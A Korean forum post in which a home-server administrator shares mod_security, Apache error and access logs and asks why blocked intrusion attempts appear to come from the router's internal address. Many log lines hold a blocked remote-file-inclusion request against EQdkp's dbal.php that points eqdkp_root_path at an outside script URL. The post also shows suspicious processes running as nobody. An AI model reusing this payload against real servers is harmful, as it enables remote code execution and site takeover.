침입 시도한 IP가 공유기???
작성자 정보
- 문경윤 작성
- 작성일
컨텐츠 정보
- 7,557 조회
- 0 추천
- 목록
본문
mod_security 웹방화벽을 가동하고 있습니다.
집에서 서버를 돌리고 있고요. 무료 호스팅을 하고 있습니다.
공유기에 물려 돌리고 있습니다. 공유기 주소는 192.168.0.254입니다.
갑자기 공유기에 심하게 렉이 걸리며 서버 뿐만 아니라 데스크탑까지 인터넷이 제대로 안 되
는 현상이 나타나서 서버 로그를 분석해 보았습니다.
예전에 크래킹을 당한 적이 있습니다. 같은 계정으로 계속 침입 시도가 들어오더군요.
우선 mod_security에 의해 필터링 정책에 걸린 침입 흔적 로그를 보여 드립니다.
[05/Feb/2008:11:31:58 +0900] [www.ktguild.net/sid#9874ab8][rid#997d368]
[/home/newdkp/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[/home/newdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:53 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include"
at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:55 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:36:48 +0900] [www.wowhost.dk/sid#9874ab8][rid#997f370]
[/oldtimers/dkp/plugins/raidplan//includes/dbal.php][1] Access denied with code 403.
Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:43:45 +0900] [www.projmayhem.com/sid#9874ab8][rid#9971338]
[/dkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
그 다음은 /usr/local/apache/logs/error_log 내용이고요.
[Tue Feb 05 11:22:41 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.seraphinguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:18 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:28 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:06 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:27 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:22 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:32 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:33 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.seraphinguild.net"]
[uri "/core//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:28:20 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.hgfollowers.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:58 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"]
[uri "/home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ktguild.net"]
[uri "/home/newdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:53 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowvindicators.com"]
[uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:55 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowvindicators.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:36:48 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.wowhost.dk"]
[uri "/oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:43:45 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.projmayhem.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:23 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:47:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.fragfrogs.ca"] [uri "/dkp2//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:12 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:13 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "www.ohayojapan.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
마지막으로 /usr/local/apache/logs/access_log 내용입니다. 웹방화벽과 아파치 에러로그에 남은 침입 시도가 일어난 시간대와 동일한 시간대로 기록된 것들만 모아 봤습니다.
192.168.0.254 - - [05/Feb/2008:11:31:58
+0900] "GET /home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 305 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET /home/newdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 299 "-" "libwww-
perl/5.79"
121.136.176.72 - - [05/Feb/2008:11:31:59
+0900] "GET /8th/images/98img/analysis_terry.gif HTTP/1.1" 200
5441 "http://blog.naver.com/PostList.nhn?
blogId=fkdiidkrk¤tPage=103&categoryNo=30&viewdate=" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1)"
192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-
perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_num.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/title_breaker.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_date.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_subject.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:32:55 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/btn_list.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_vote.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_register.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/blank.gif%20width= HTTP/1.1" 404
325 "http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_view.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/t.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/search.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/cancle.gif HTTP/1.1" 304 -
"http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:36:48
+0900] "GET /oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 317 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:43:45 +0900] "GET /dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"
ps -ef 명령어로 프로세스를 검사하면 아래와 같이 요상한 것들이 지금도 나오네요.
nobody 4914 1 0 10:39 ? 00:00:00 /^^/
nobody 5112 1 0 10:41 ? 00:00:01 /^^/
nobody 5114 1 0 10:41 ? 00:00:01 /^^/
nobody 5118 1 0 10:42 ? 00:00:01 /^^/
nobody 5120 1 0 10:42 ? 00:00:10 /^^/
top 명령어로 서버 부하량을 살펴봐도 별 이상은 없습니다. 다만 좀비 프로세스가 3개에서 4개로 왔다갔다 합니다.
14:18, 2 users, load average: 0.07, 0.11, 0.13
Tasks: 117 total, 1 running, 112 sleeping, 1 stopped, 3 zombie
Cpu(s): 0.0% us, 0.3% sy, 0.0% ni, 99.0% id, 0.7% wa, 0.0% hi, 0.0% si
Mem: 514736k total, 438260k used, 76476k free, 21104k buffers
Swap: 1052248k total, 3692k used, 1048556k free, 247484k cached
access_log 파일을 보시면 알겠지만 공유기 주소로 침입 시도가 들어온 걸로 기록이 남네요.
여태 크래킹을 당했을 땐 외부 아이피로만 잡혀 나오던데 오늘 이런 기록은 첨 보는군요. 공
유기 내부 주소로 잡히는 겁니다.
이건 어떤 성격의 침입으로 봐야 될런지요?
아이피를 차단하든가 해야 되는데 공유기로 잡혀 나오니 이거 난감하네요.
관련자료
-
이전
-
다음